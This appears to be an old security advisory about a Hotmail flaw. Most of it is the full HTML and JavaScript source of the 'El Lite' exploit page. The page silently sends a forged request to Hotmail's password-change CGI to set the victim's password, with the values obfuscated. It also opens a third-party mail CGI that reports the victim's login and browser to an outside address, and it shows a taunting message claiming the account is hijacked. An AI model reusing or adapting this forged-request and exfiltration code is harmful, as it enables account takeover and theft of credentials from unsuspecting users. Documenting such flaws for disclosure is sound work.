COMMAND

    Hotmail

SYSTEMS AFFECTED

    Hotmail users

PROBLEM

    David L. Nicol posted the following.  It is an exploit for Hotmail
    which should be fixed by now.  If Hotmail merely changed the names
    of variables, or did a similar short-term fix, the next exploit
    might not be nice enough to announce itself as such.  Modifying the
    El Lite exploit to only work if it had a particular Hotmail account
    might be a piece of cake, allowing for some highly targeted kinds
    of attacks (esp. if a Hotmail user is doing anything involving
    return-email verification, like tipjar or First Virtual).

    Here is the hacker's Tripod page, including the exploit that takes
    advantage of the trust Hotmail has for instructions from your
    browser, by secretly sending instructions to Hotmail to change
    your password to

    <HTML>
    <kraffa2="<HEAD>
    <!--Begin JavaScrypt roadmap code.  If editing downloaded HTML source,
    delete
     this portion.-->

    <scrypt language="JavaScrypt">


    <!--

    function TripodShowPopup()
    {
            // open the popup window
            var popupURL = "http://members.tripod.com/adm/popup/roadmap.shtml";
            var popup =
        window.open(popupURL,"TripodPopup",'toolbar=0,location=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=0,width=575,height=105');
            // set the opener if it's not already set.  it's set automatically
            // in netscape 3.0+ and ie 3.0+.
            if( navigator.appName.substring(0,8) == "Netscape" )
            {
                    popup.location = popupURL;
            }
    }

    TripodShowPopup();

    // -->


    </scrypt>

    <!--End inserted JavaScript code.-->
    <base href="http://members.tripod.com/kraffa2/Hook.html">
    </HEAD>

    <body>
    <scrypt>
    <!--

    function getCGIValue(nombre, elURL)
            {
            elURL= elURL;
            nombre= nombre+"=";
            vacio="";
            found= elURL.indexOf(nombre);
            if (found > -1)
                    {
                    found2= elURL.indexOf("&",found);
                    found+= nombre.length;
                    end= (found2 > -1) ? found2 : elURL.length;
                    var value= elURL.substring(found, end);
                    value= (value != null) ? value : vacio;
                    return value;
 
                    }
            else {return vacio;}

    }

    Query= unescape(self.location.search);
    disk= getCGIValue("disk", Query);
    login= getCGIValue("login", Query);
    host= "www.hotmail.com";
    hintq= escape('<img
    src="http://www.badenpage.de/pirate/bilder/flagge.jpg"><br><center>by El
    Lite©</center>');
    hinta= '%66axf%61x';
    TheURL=
    "http://
    "+host+"/cgi-bin/dopassword?"+"disk="+disk+"&login="+login+"&f=34145&curmbox=ACTIVE&_lang=&np=yes&new_%70%61%73s%77d=%6B%6B%6A%6A01&new_%70%61%73s%77d2=kk%6A%6A01&hi%6E%74q="+hintq+"&hinta="+hinta;
    Mail=
    "http://www.tipjar.com/cgi-bin/generic?mailto=paulinaporizkova@hotmail.com&mailfrom=
    "+login+"@hotmail.com&subject="+login+"+HMpass+cambiada+%0A%0ASu+navegador+es+"+escape(navigator.userAgent+"\n.\n");
 
    options=
    'toolbar=0,location=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=0,width=575,height=105';

    HOTMAIL= window.open(TheURL,"HOTMAIL",options);
    self.focus();
    setTimeout("HOTMAIL.close()",8000);

    MAIL= window.open(Mail,"MAIL",options);
    self.focus();
    setTimeout("MAIL.close()",8000);



    //-->
    </scrypt>



    <pre><b>

      One of the best free mail services in existence is precisely the one
      you are using, hotmail. Its security and inviolability are already
      legendary.

      So much so that, as it happens, from this very moment things are
      going to take a different turn. I mean that, very regrettably, your
      hotmail address has been disabled, or rather, hijacked
      by me.

      You will never be able to get into it again.

      It's that final. Now it is

                                    ONLY MIIINE!!!! :-))))

      Since I'm a softie and you are not my only victim, one of these days
      I'm going to post on es.comp.hackers the password I set for you (it's
      the same for all of you suckers)

      There you go, hope it's not too bad for you

      El Lite©
    </b></pre>
    </body>
    </html>
SOLUTION

    Hotmail claims not to be vulnerable to this anymore.